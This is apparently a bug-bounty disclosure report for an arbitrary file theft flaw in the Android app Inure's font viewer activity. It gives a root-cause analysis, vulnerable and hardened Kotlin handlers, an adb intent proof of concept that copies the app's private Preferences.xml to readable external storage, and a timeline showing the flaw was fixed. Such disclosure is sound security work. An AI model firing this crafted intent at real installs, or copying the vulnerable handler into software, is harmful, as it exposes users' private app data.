Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt in hamza417/inure

Valid

Reported on

Aug 24th 2023


Description

Using Oversecured, a vulnerability scanner for Android and iOS applications, we detected a Theft of Arbitrary Files vulnerability in TTFViewerActivity.kt. The full issue definition is shown in the image below:

Root Cause Analysis

TTFViewerActivity did not validate the incoming intent.data before passing it to openInputStream, so any URI supplied by the caller was opened with Inure's own privileges. In particular, a content:// URI addressed to Inure's own file provider (authority app.simple.inure.provider) could be used to read files from the app's internal data directory.

Exfiltrating the opened file was then straightforward, because the activity saved its copy using context.getExternalFilesDir, i.e. into the app-specific external storage directory under /storage/emulated/0/Android/data/app.simple.inure/files, which is readable from outside the app.
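The two defects above (trusting intent.data, and caching the result on external storage) in a hypothetical handler, beside a hardened version. This is an added Kotlin example, not Inure's code; the object name FontIntentHandler, the function names, and the cache directory name are assumptions, and the provider authority is taken from the PoC URI. The hardened path refuses URIs that resolve back into the app's own provider or private data directory, checks that the bytes actually carry an sfnt font header (TTF/OTF/TTC), and keeps the copy in internal cache.

```kotlin
import android.content.Context
import android.content.Intent
import android.net.Uri
import java.io.File

// Added example, not Inure's code: a hypothetical font-viewer handler in the
// vulnerable shape described in the report, beside a hardened version.
object FontIntentHandler {
    // Assumed authority of the app's own FileProvider (matches the PoC URI).
    const val OWN_PROVIDER_AUTHORITY = "app.simple.inure.provider"

    // sfnt header magics: TrueType, legacy Mac TrueType, CFF-based OpenType, TrueType collection.
    private val SFNT_MAGICS = listOf(
        byteArrayOf(0x00, 0x01, 0x00, 0x00),
        "true".toByteArray(Charsets.US_ASCII),
        "OTTO".toByteArray(Charsets.US_ASCII),
        "ttcf".toByteArray(Charsets.US_ASCII),
    )

    /** Vulnerable shape: opens whatever URI the caller sent and writes the copy to
     *  the app-specific external directory, where it is readable from outside the app. */
    fun handleVulnerable(context: Context, intent: Intent): File? {
        val uri = intent.data ?: return null
        val dir = context.getExternalFilesDir("font_cache") ?: return null
        val out = File(dir, uri.lastPathSegment ?: "font.ttf")
        context.contentResolver.openInputStream(uri)?.use { input ->
            out.outputStream().use { output -> input.copyTo(output) }
        }
        return out
    }

    /** Returns null if [uri] may be opened, otherwise the reason it is refused. */
    fun rejectReason(context: Context, uri: Uri): String? {
        return when (uri.scheme) {
            "content" ->
                // Our own provider serves our own files; an external caller asking us to
                // open one of them is exactly the arbitrary-file-read in this report.
                if (uri.authority == OWN_PROVIDER_AUTHORITY) "URI targets the app's own provider" else null
            "file" -> {
                // file:// URIs are opened with this app's UID, so refuse anything that
                // resolves (after ../ normalisation) into the private data directory.
                val path = uri.path ?: return "file URI without a path"
                val canonical = File(path).canonicalPath
                val privateDir = File(context.applicationInfo.dataDir).canonicalPath
                if (canonical == privateDir || canonical.startsWith(privateDir + File.separator))
                    "file URI points into the private data directory" else null
            }
            else -> "unsupported scheme: ${uri.scheme}"
        }
    }

    /** True if the first four bytes look like an sfnt-based font (TTF/OTF/TTC). */
    fun looksLikeFont(header: ByteArray): Boolean =
        header.size >= 4 && SFNT_MAGICS.any { it.contentEquals(header.copyOf(4)) }

    /** Hardened: validates the URI, checks the content really is a font, and keeps
     *  the copy in internal cache instead of external storage. */
    fun handleHardened(context: Context, intent: Intent): File? {
        val uri = intent.data ?: return null
        if (rejectReason(context, uri) != null) return null
        // Drop any directory component of the name so it cannot escape font_cache.
        val name = File(uri.lastPathSegment ?: "font.ttf").name
        val dir = File(context.cacheDir, "font_cache").apply { mkdirs() }
        val out = File(dir, name)
        val input = context.contentResolver.openInputStream(uri) ?: return null
        input.use { stream ->
            val header = ByteArray(4)
            // Preferences.xml begins with "<?xm", so it fails here even if the URI check were bypassed.
            if (stream.read(header) < 4 || !looksLikeFont(header)) return null
            out.outputStream().use { output ->
                output.write(header)
                stream.copyTo(output)
            }
        }
        return out
    }
}
```

Against the PoC URI, rejectReason returns a non-null reason because the authority is the app's own provider, so nothing is opened; the header check is a second, independent line of defence. Separately from the activity, a FileProvider should only export the specific subdirectories it needs: the root/ segment in the PoC URI mapping onto /data/data/app.simple.inure/... shows the provider was serving far more than a font cache.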

This was chained with an insecure provider paths configuration, which is what let the provider serve the internal file in the first place: the root/ prefix in the PoC URI maps directly onto /data/data/app.simple.inure/..., so the provider exposed far more of the filesystem than it needed to.

Proof of Concept

Open a device shell with adb shell and navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache to inspect the directory. Initially it is empty:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 6  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..

Send the following intent:

adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"

Inspect the font_cache directory again and note that Preferences.xml has been saved there:

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la  
total 10  
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .  
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..  
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml 
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>  
<map>  
<boolean name="apk_external_storage" value="false" />  
<boolean name="is_external_storage" value="false" />  
<int name="app_accent_color" value="-29592" />  
<boolean name="dont_show_again" value="true" />  
<int name="main_app_launch_count" value="13" />  
<boolean name="is_custom_color" value="false" />  
<int name="view_positions" value="7" />  
<int name="notes_list_type" value="0" />  
<boolean name="disclaimer_agreed" value="true" />  
<string name="last_search_keyword"></string>  
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>  
<long name="crash_timestamp" value="-1" />  
<boolean name="deep_search_keyword_mode" value="false" />  
</map>  

angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $

Impact

An application's private data directory and the files within it must never be accessible to other applications on the device. This report shows that a malicious third-party app can send a crafted VIEW intent to TTFViewerActivity, have Inure copy a file from its own private directory into the app-specific external storage directory, and then read it from there. The second step relies on that external directory being readable by the attacker: on Android 10 and earlier READ_EXTERNAL_STORAGE suffices, whereas on Android 11 and later scoped storage prevents other apps from reading Android/data/<package> directories. The unvalidated intent handling is a defect regardless of that.

We are processing your report and will contact the hamza417/inure team within 24 hours. a month ago
Carlo Jae Avila modified the report a month ago
We have contacted a member of the hamza417/inure team and are waiting to hear back a month ago
Hamza Rizwan validated this vulnerability 23 days ago
Carlo Jae Avila has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hamza Rizwan marked this as fixed in build92 with commit 7db551 23 days ago
Hamza Rizwan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Sep 10th 2023
Hamza Rizwan gave praise 23 days ago
Thanks for the heads-up. I added a wrong commit hash accidentally, I hope this won't be an issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Hamza Rizwan published this vulnerability 12 days ago